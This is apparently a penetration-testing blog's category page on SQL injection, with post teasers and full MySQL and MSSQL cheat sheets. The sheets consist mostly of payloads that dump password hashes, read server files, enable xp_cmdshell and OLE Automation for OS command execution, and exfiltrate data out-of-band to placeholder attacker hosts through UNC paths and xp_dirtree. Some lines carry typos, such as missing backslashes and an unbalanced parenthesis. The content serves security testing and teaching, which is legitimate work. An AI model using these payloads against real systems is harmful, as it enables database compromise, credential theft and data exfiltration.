Category: Injection

SQL Injection: Out-of-Band Exploitation

This is an advanced SQL Injection (SQLi) post, if you’re new to SQLi maybe try this one first: Basics and Defence

 

Recently I had a fairly slow Time-Based SQL injection vulnerability, meaning that I could only pull a single character at a time with SQLmap and each character took around 10 seconds to retrieve. An alternative approach in this situation is to use out-of-band retrieval.  This is a concept that can be used when exploiting lots of vulnerabilities such as SQL Injection, Command Injection, Cross-site Scripting and XML External Entity Injection.

The idea is fairly simple, instead of capturing the data you would like to retrieve and extracting it through Boolean-logic you can request the system to transmit the data over a protocol such as HTTP, SMB or DNS.

Continue reading: SQL Injection: Out-of-Band Exploitation

SQL Injection Filter Evasion with sqlmap

Whenever I find a SQL injection vulnerability I always throw sqlmap at the injection point. It’s a simple, easy to use tools that will not only prove the vulnerability but allow you to extract data, gain command execution, and generally push further on with your penetration test. If I come across a filter or a web application firewall then I’ll habitually break out Burp Suite and start working on filter evasion manually, however there’s often a simpler way.

Continue reading: SQL Injection Filter Evasion with sqlmap

SQL Injection Cheat Sheet: MySQL

MSSQL
MySQL

Comments
#
/*
-- -
;%00


Version
SELECT VERSION();
SELECT @@VERSION;
SELECT @@GLOBAL.VERSION;


User details
user()
current_user()
system_user()
session_user()
SELECT user,password FROM mysql.user;


Database details
SELECT db_name();
SELECT database();
SELECT schema_name FROM information_schema.schemata;


Database credentials
SELECT host, user, password FROM mysql.user;


Server details
SELECT @@hostname;


Table Name
SELECT table_name FROM information_schema.tables;


Columns Names
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';


No Quotes
CONCAT(CHAR(97), CHAR(98), CHAR(99))


String Concatenation
CONCAT(foo, bar)

 
Conditionals
SELECT IF(1=1,'true','false');

 
Time-delay
Sleep(10)


Command Execution
http://dev.mysql.com/doc/refman/5.1/en/adding-udf.html


"RunAs"
N/A


Read Files
SELECT LOAD_FILE('C:Windowswin.ini');


Out-of-Band Retrieval
SELECT LOAD_FILE(concat('\\',(SELECT 1), 'attacker.controlledserver.com\')));


Substrings
SELECT substr(‘Foobr’, 1, 1);


Retrieve Nth Line
SELECT * FROM table ORDER BY ID LIMIT 3,1

 

This article is part of a Series, there are more to read below!
Basics and Defence
Exploitation
Filter Evasion with SQLmap
MySQL Cheat Sheet
MSSQL Cheat Sheet
Out-of-band Exploitation

SQL Injection Cheat Sheet: MSSQL

MSSQL
MySQL

Comments
/*
--
;%00


Version
SELECT @@version;
SELECT @@VERSION LIKE '%2008%';


User details
SELECT user;
SELECT current_user;
SELECT SYSTEM_USER;
SELECT USER_NAME();
SELECT USER_NAME(2);
SELECT SUSER_SNAME();
SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);


Database details
SELECT DB_NAME();
SELECT DB_NAME(5);
SELECT name FROM master..sysdatabases;


Database credentials
SELECT name %2b ':'  %2b master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;


Server details
SELECT @@servername; SELECT host_name(); SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel');


Table Names
SELECT name FROM master..sysobjects WHERE xtype='U';
SELECT table_name FROM information_schema.tables;


Columns Names
SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename';
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';


No Quotes
SELECT * FROM Users WHERE username = CHAR(97) + CHAR(98) + CHAR(99);
ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) = 97;
ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) < 128;


String Concatenation
SELECT CONCAT('a','a','a');
SELECT 'a' %2b 'b' %2b 'c' %2b 'd';


Conditionals
IF 1=1 SELECT 'true' ELSE SELECT 'false';
SELECT CASE WHEN 1=1 THEN true ELSE false END;


Time-delay
WAITFOR DELAY 'time_to_pass';
WAITFOR TIME 'time_to_execute';


Enable Command Execution
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure reconfigure;
EXEC sp_configure 'xp_cmdshell', 1;
EXEC sp_configure reconfigure;


Command Execution
EXEC master.dbo.xp_cmdshell 'cmd';


Enable Alternative Command Execution
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure reconfigure;
EXEC sp_configure 'OLE Automation Procedures', 1;
EXEC sp_configure reconfigure;


Alternative Command Execution
DECLARE @execmd INT;
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT;
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%system32cmd.exe /c';


"RunAs"
SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'password', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
EXECUTE AS USER = 'FooUser';


Read Files
BULK INSERT dbo.temp FROM 'c:\foobar.txt' WITH ( ROWTERMINATOR='n' );


Out-of-Band Retrieval
;declare @q varchar(200);set @q='\attacker.controlledserver'+(SELECT SUBSTRING(@@version,1,9))+'.malicious.com/foo'; exec master.dbo.xp_dirtree @q; --  


Substrings
SUBSTRING(table_name,1,1) FROM information_schema.tables = 'A';
ASCII(SUBSTRING(table_name,1,1)) FROM information_schema.tables > 96;


Retrieve Nth Line
SELECT TOP 1 table_name FROM information_schema.tables;
SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables);

 

This article is part of a Series, there are more to read below!
Basics and Defence
Exploitation
Filter Evasion with SQLmap
MySQL Cheat Sheet
MSSQL Cheat Sheet
Out-of-band Exploitation

SQL Injection: Exploitation

Structured Query Language (SQL) is used all over the web and is potentially vulnerable to an injection attack any time that user input is insecurely concatenated into a query. An injection attack allows an attacker to alter the logic of the query and the attack can lead to confidential data theft, website defacement, malware propagation and host or network compromise.

Continue reading: SQL Injection: Exploitation